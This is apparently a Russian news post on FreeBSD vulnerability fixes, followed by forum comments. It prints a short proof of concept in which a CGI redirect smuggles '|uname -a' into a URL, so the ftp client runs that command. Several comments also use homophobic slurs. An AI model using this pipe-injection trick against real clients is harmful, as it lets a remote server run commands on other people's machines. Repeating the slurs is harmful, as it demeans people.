Разработчики FreeBSD опубликовали серию уведомлений об устранении уязвимостей:
Техника атаки:
a20$ pwd /var/www/cgi-bin a20$ ls -l total 4 -rwxr-xr-x 1 root wheel 159 Oct 14 02:02 redirect -rwxr-xr-x 1 root wheel 178 Oct 14 01:54 |uname -a a20$ cat redirect #!/bin/sh echo 'Status: 302 Found' echo 'Content-Type: text/html' echo 'Connection: keep-alive' echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a' echo a20$ a20$ ftp http://localhost/cgi-bin/redirect Trying ::1:80 ... ftp: Can't connect to `::1:80': Connection refused Trying 127.0.0.1:80 ... Requesting http://localhost/cgi-bin/redirect Redirected to http://192.168.2.19/cgi-bin/|uname%20-a Requesting http://192.168.2.19/cgi-bin/|uname%20-a 32 101.46 KiB/s 32 bytes retrieved in 00:00 (78.51 KiB/s) NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36 ADT 2014 Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE BOARD evbarm a20$
Дополнительно сообщается об устранении не связанной с безопасностью ошибки, которая может привести к нарушению целостности кэша при доступе к ZFS-разделу поверх NFSv4.
Я - дочь эксперта, тут не всё так однозначно ... :)
В рядах шкoльников, еще вчера рассказывавших про Качественный Код (R) (C) (tm) случилось замешательство? Код оказался не таким уж и качественным? Бывают в жизни огорчения.
На лоре вообще какие-то ламаки остались. Ну ок, кучка отказов в обслуживании. При том половина из них делает хуже только самому атакующему, вызвав отказ его же виртуалки. Непорядок, конечно, но если некто ушатал свою же виртуалку - ему же хуже первым делом и будет.
Первая уязвимость, с ftp - это просто перепев Рабиновича с wget :-\
А чего там доказывать? Достаточно посмотреть на то как попсовые убунты и даже слоупочные дебианы hardening процессов и ядра раньше сделали. В дебианобразных даже милый такой скриптец есть - запускаешь hardening-check <свежесобранный бинарь> и узнаешь насколько ты (не) лох...
Алгоритм Шлемиля в действии! Вспоминается фильм "13 этаж", где после окончания дороги, которую провёл Шлемиль, начинается нечто...
Курить меньше надо.
Скорее получить по черепушке от обработчика исключений.
Проверяют как работает кросс-компиляция NetBSD для ARM под Cygwin? Видимо работает.
Потому что не зря говорят что бсдшники - латентные проприетарщики. Вон изя с маздайкой. Хотя можно примеры и позабористее, типа кибаба с пид...ской операционкой.
Так какие же они тогда линуксоиды? Они пи...сы, а вовсе не... :)
Да потому что Jared - не разработчик и не пользователь NetBSD как десктопной системы. Это-же очевидно! зачем ему такие сложности? Можно подумать что все разработчики линукс-бейзд коробочек за 50$ сидят под линуксом. Ага, ждите. У всех - семерочка.
Зачем им такие сложности?
Камрад, рекомендую вернуться к реальной жизни. Большинство из разработчиков эмбедовки не гики и им пофигу под чем сидеть, но поскольку семерку пихают везде и она является default OS на 90% десктопов, то и разрабатывают эмбедовку из под нее. Это же очевидно.
Так, глядя на куби прицепленный к компу с линухом: а зачем мне семерочка? Дебиан или убунту респинить на такую платку удобнее из такого же дебианобразного. И как десктоп оно покрывает все мои нужды. А использовать цыгвин можно только из чувства мазохизма. Или если объект фапа еще более гуняв чем это.
Таки да, любитель putty.exe теперь не отмажется.
WTF?
Что такое "стёк"?
Ну подумаешь, полкило туда, полкило сюда...